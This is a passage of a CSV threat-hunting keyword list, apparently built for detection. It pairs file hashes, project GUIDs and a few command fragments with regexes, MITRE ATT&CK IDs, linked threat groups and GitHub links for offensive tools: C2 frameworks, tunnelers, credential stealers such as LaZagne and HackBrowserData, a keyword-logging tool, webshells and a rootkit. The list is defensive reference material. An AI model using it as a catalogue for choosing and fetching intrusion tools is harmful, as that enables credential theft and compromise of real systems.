servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","27906" 
"*636b4e445770ac1cf66687e9a1ce57347221eeb539f14fe4b0b60f387cc41009*",".{0,1000}636b4e445770ac1cf66687e9a1ce57347221eeb539f14fe4b0b60f387cc41009.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27907" "*6376A5B0-1BA8-4854-B81E-F5DC072C0FEE*",".{0,1000}6376A5B0\-1BA8\-4854\-B81E\-F5DC072C0FEE.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#GUIDproject","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","27908" "*63790d59bba24d6d5b164d52d837f51bae95f4f6b6337df180c3d7cad3194c73*",".{0,1000}63790d59bba24d6d5b164d52d837f51bae95f4f6b6337df180c3d7cad3194c73.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","27909" "*63794d03a5550be74cf88df14b42968a7e23a58eea0690d23fedf01f57067166*",".{0,1000}63794d03a5550be74cf88df14b42968a7e23a58eea0690d23fedf01f57067166.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27910" "*63839def4c061f214718a67dc487187d5b73288d72845c4007b5162ad57dd47b*",".{0,1000}63839def4c061f214718a67dc487187d5b73288d72845c4007b5162ad57dd47b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27911" "*638f7368dfceb394d7ad1c927ce5399386833816bd099ae41db5a249c3ff8362*",".{0,1000}638f7368dfceb394d7ad1c927ce5399386833816bd099ae41db5a249c3ff8362.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch 
connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","27913" "*63957210-4871-42D3-B98A-191AF5F91079*",".{0,1000}63957210\-4871\-42D3\-B98A\-191AF5F91079.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#GUIDproject","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","27916" "*639EF517-FCFC-408E-9500-71F0DC0458DB*",".{0,1000}639EF517\-FCFC\-408E\-9500\-71F0DC0458DB.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","#GUIDproject","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","27918" "*63a6adaa32811c62d5749052c03057771fb33ae63a765a0ecc480829442dc91e*",".{0,1000}63a6adaa32811c62d5749052c03057771fb33ae63a765a0ecc480829442dc91e.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","0","#filehash","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","27920" "*63a6bad64de560056ed496b6b7103056e4bdaf19f49011120997a5b87d141940*",".{0,1000}63a6bad64de560056ed496b6b7103056e4bdaf19f49011120997a5b87d141940.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 
","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","#filehash","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","27921" "*63adf3a9c56126fa024fea0bb7f4c175bbfe48c4fe06b016985ffea27142c5d8*",".{0,1000}63adf3a9c56126fa024fea0bb7f4c175bbfe48c4fe06b016985ffea27142c5d8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27922" "*63b104b8d35cf8e3ae08ed500e337ce1617533f8c0b38eef55a07cdca529324f*",".{0,1000}63b104b8d35cf8e3ae08ed500e337ce1617533f8c0b38eef55a07cdca529324f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27923" "*63b2a6c8846a7e0c5116f9fd61281e092cf0db6374730d041029a1b4d3aac96b*",".{0,1000}63b2a6c8846a7e0c5116f9fd61281e092cf0db6374730d041029a1b4d3aac96b.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27924" "*63bf4fdc657ca1599e0f4b6657bf656a5c9f9f3eeb7af957e511707436109835*",".{0,1000}63bf4fdc657ca1599e0f4b6657bf656a5c9f9f3eeb7af957e511707436109835.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform 
proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","27925" "*63c026b6e54d35d2c987267fd01894021efea0f83a87e98c142b96f10f301914*",".{0,1000}63c026b6e54d35d2c987267fd01894021efea0f83a87e98c142b96f10f301914.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#filehash","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","27926" "*63c0ab8a69d5eaf913b7f348ff7ab6705e8185283d08f455b7f194319ebf7f12*",".{0,1000}63c0ab8a69d5eaf913b7f348ff7ab6705e8185283d08f455b7f194319ebf7f12.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27927" "*63c0c9e03586b36bba16e6cd2f73a71d675f39e9a4c87b09aaa2253cb763c833*",".{0,1000}63c0c9e03586b36bba16e6cd2f73a71d675f39e9a4c87b09aaa2253cb763c833.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27928" "*63caa714b73110ab5d2e14db8fcddc0ddea627f5bd92bcfacb9d2c6e507e6a84*",".{0,1000}63caa714b73110ab5d2e14db8fcddc0ddea627f5bd92bcfacb9d2c6e507e6a84.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27929" "*63CAF2AD-A016-43BD-AA27-02CB848E2067*",".{0,1000}63CAF2AD\-A016\-43BD\-AA27\-02CB848E2067.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","27930" "*63cfc7750ccf7f7ad82a20890b6957069e0471d976a0a3a960ebef69b6641234*",".{0,1000}63cfc7750ccf7f7ad82a20890b6957069e0471d976a0a3a960ebef69b6641234.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27932" "*63d02e75b729e2cc17604235cf9c0b506b3ca5d578a8e32a0e85e28763ca25a6*",".{0,1000}63d02e75b729e2cc17604235cf9c0b506b3ca5d578a8e32a0e85e28763ca25a6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27933" "*63d84b4b0a5acad4d2bf346c746f60f53e6e14c09ae6d5271cd755a6ebcdcf66*",".{0,1000}63d84b4b0a5acad4d2bf346c746f60f53e6e14c09ae6d5271cd755a6ebcdcf66.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27935" 
"*63da55b370a27e54e02b3d7b56515734dd12a930faec455beaf2c6e9bcbfab32*",".{0,1000}63da55b370a27e54e02b3d7b56515734dd12a930faec455beaf2c6e9bcbfab32.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","27936" "*63dcdf6e5eb8252ec73b58bde6249db9d38272dc6870074d2569f7431a1ab32f*",".{0,1000}63dcdf6e5eb8252ec73b58bde6249db9d38272dc6870074d2569f7431a1ab32f.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","27937" "*63e119d9a3c93d0751e545753aa05c59ed767d3d0f87ae6b9a4309573899f117*",".{0,1000}63e119d9a3c93d0751e545753aa05c59ed767d3d0f87ae6b9a4309573899f117.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27938" "*63e9c4ad28c4ee5fd63bee6124590a0edb6c7dc4b20d1b4f6aefdb53f5b94a1a*",".{0,1000}63e9c4ad28c4ee5fd63bee6124590a0edb6c7dc4b20d1b4f6aefdb53f5b94a1a.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","27940" "*63ec96c5-075f-4f22-92ec-cf28a2f70737*",".{0,1000}63ec96c5\-075f\-4f22\-92ec\-cf28a2f70737.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#GUIDproject","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","27941" "*63ee1eb3f80d8eb690404beaee64db746c1b94158fef0933f441692eeff43fa8*",".{0,1000}63ee1eb3f80d8eb690404beaee64db746c1b94158fef0933f441692eeff43fa8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27942" "*63ef9e8f57db894995c6c89dc58c854d529b8480078b5b608cc6e75722f4c713*",".{0,1000}63ef9e8f57db894995c6c89dc58c854d529b8480078b5b608cc6e75722f4c713.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27943" "*63f5ce1c0d7cacc9f68421eb56b0640a48fd52695fefbe3589d7a2520a684123*",".{0,1000}63f5ce1c0d7cacc9f68421eb56b0640a48fd52695fefbe3589d7a2520a684123.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27944" "*63f6929cf8f9c534611dc567df4e773bc6172288d3c6edcb3f92a09e303ca8d6*",".{0,1000}63f6929cf8f9c534611dc567df4e773bc6172288d3c6edcb3f92a09e303ca8d6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27945" "*-64 -format=reflective-dll *",".{0,1000}\-64\s\-format\=reflective\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","27947" "*64==eyJzbGVlcF9zZWNvbmRzIjogMjAsICJ2YXJpYXRpb25fc2Vjb25kcyI6IDB9*",".{0,1000}64\=\=eyJzbGVlcF9zZWNvbmRzIjogMjAsICJ2YXJpYXRpb25fc2Vjb25kcyI6IDB9.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27948" "*64==eyJzbGVlcF9zZWNvbmRzIjogNSwgInZhcmlhdGlvbl9zZWNvbmRzIjogNn0=*",".{0,1000}64\=\=eyJzbGVlcF9zZWNvbmRzIjogNSwgInZhcmlhdGlvbl9zZWNvbmRzIjogNn0\=.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27949" 
"*64005eea1af219477177e1f5a2479f4214705ef814f2ca2e70d921bf696b0808*",".{0,1000}64005eea1af219477177e1f5a2479f4214705ef814f2ca2e70d921bf696b0808.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","27950" "*640e8023020b5e649ff5f7571e6402f0f3c3524a1a43113335e2fece9505aba9*",".{0,1000}640e8023020b5e649ff5f7571e6402f0f3c3524a1a43113335e2fece9505aba9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27952" "*6412cb5d528ee93be2fc08b2c72cdee6c36e38ce5064d2685139bcbf9962298f*",".{0,1000}6412cb5d528ee93be2fc08b2c72cdee6c36e38ce5064d2685139bcbf9962298f.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","27954" "*641816acccccdfc2ed22e186d2f82a9a2c558617542a9e4b69b284a330a15daa*",".{0,1000}641816acccccdfc2ed22e186d2f82a9a2c558617542a9e4b69b284a330a15daa.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27956" "*641867dbb57f198f42dc86ea0d27eaaab36190417ffc24e6a186c831a98c0051*",".{0,1000}641867dbb57f198f42dc86ea0d27eaaab36190417ffc24e6a186c831a98c0051.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","27957" "*641a94207f95ee2eb5cff95317e1aab73db6366fd3c2e5942bae83f0f3cb666f*",".{0,1000}641a94207f95ee2eb5cff95317e1aab73db6366fd3c2e5942bae83f0f3cb666f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27959" "*64293e56dfaad772c31a8d53e7ea876b9db7aaea29e89381684f56227952813a*",".{0,1000}64293e56dfaad772c31a8d53e7ea876b9db7aaea29e89381684f56227952813a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27961" 
"*643ad690-5c85-4b12-af42-2d31d11657a1*",".{0,1000}643ad690\-5c85\-4b12\-af42\-2d31d11657a1.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#GUIDproject","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","27964" "*643d5833bf21a57f837071016958a67d73868d730a85b637ec71bdf3705068aa*",".{0,1000}643d5833bf21a57f837071016958a67d73868d730a85b637ec71bdf3705068aa.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27965" "*643de75be44ad32b70cee688f031ea110a078d6cffb79a48001717a5e0ebf909*",".{0,1000}643de75be44ad32b70cee688f031ea110a078d6cffb79a48001717a5e0ebf909.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. 
Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","0","#filehash","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","27966" "*643e677418a7b03b82f340efb76cdb2dad8c63dca5f14b653b0b2d89376dced5*",".{0,1000}643e677418a7b03b82f340efb76cdb2dad8c63dca5f14b653b0b2d89376dced5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27967" "*644758B1-C146-4D3B-B614-8EB6C933B0AA*",".{0,1000}644758B1\-C146\-4D3B\-B614\-8EB6C933B0AA.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","0","#GUIDproject","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","27970" "*6448c50a9a80154c2f1ca5b7525ffc8822f16562b1774a54efd066fcc80620e8*",".{0,1000}6448c50a9a80154c2f1ca5b7525ffc8822f16562b1774a54efd066fcc80620e8.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","27971" "*644AFE4A-2267-4DF9-A79D-B514FB31830E*",".{0,1000}644AFE4A\-2267\-4DF9\-A79D\-B514FB31830E.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has 